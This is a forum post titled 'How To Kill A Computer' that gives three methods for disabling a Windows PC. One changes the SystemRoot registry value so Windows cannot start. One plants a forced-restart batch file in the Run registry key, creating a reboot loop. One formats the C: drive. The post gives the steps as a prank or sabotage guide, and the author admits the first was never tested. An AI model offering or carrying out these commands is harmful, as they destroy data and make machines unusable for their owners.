DaUnknownAdmin.Com
  • Welcome (Back) To DaUnknownAdmin.Com I've been able to restore the databases for DOFCH.Com, Freestyle.FM, and WhatChaMissin.Com. (There's also a tiny gaming clan forum.) You should be able to log in using your old login information. If you have forgotten it, you can reset your password. You can also use the facebook app to log in. Be sure to drop by our Roll Call Thread

If I helped you to log in by resetting your password, be sure to change the password at https://daunknownadmin.com/forums/index.php?account/security

How To Kill A Computer

WillyV.

Rebel
Staff member
DOFCH.COM
Method 1-----------------------------------
--------------------------------------------------------------------------

Click Start and then Run and type in regedit find the directory \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windo ws NT\CurrentVersion

Now Look For The Key Called : SystemRoot
Double Click On It And Change It To What Ever u Want except for C:\WINDOWS

FAQ'S

Q: How will this screw up a computer.
A: When a computer starts it needs certain files like .dlls and by changing this it looks for them in a folder that doesnt have it causing it to not start windows.

Q: Can i fix this?
A: I guess if you reinstall windows or use a live cd of linux (dont try safemode wont work)

Q: Have you tried this?
A: Nope but it probally works.

Q:Howd u find this out?
A: I was bored.

-----------------------------------------
Method 2
-----------------------------------------

Now the fun part go into a folder i am using C:\WINDOWS

Go to run and type in notepad

In notepad write

Code:
[LEFT]@echo off
shutdown -r -f[/LEFT]
and then save it as hi.bat make sure you save it as all files AND ALSO SAVE IT IN THE DIRECTORY YOU DECIDED TO USE BEFORE LIKE I CHOSE C:\WINDOWS

Go to run type in Regedit

Then find the directory HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run

Right click then select NEW - String Value
Name it what ever you want

Then double click on it and make sure where it says value data it says
Code:
[LEFT]"C:\WINDOWS\hi.bat" -atboottime[/LEFT]

[LEFT]NOTE KEEP "C:\WINDOWS\hi.bat" -atboottime EXACTLY AS IT IS DONT REMOVE PERENTHESES[/LEFT]

[LEFT]P.S. If you chose a different directory to save hi.bat in write that instead of C:/WINDOWS[/LEFT]
This will automaticly end all programs without warning and restart after.

------------------------------------------------------------------------------------------------------------------------------------
method 3
------------------------------------------------------------------------------------------------------------------------------------

Go to run type in CMD then type format c:
This will fuck every thing oh yeah turn off the computer (pull out the plug) deletes everything

I was gonna say Hammer but a golf club will do the same too...lol

Back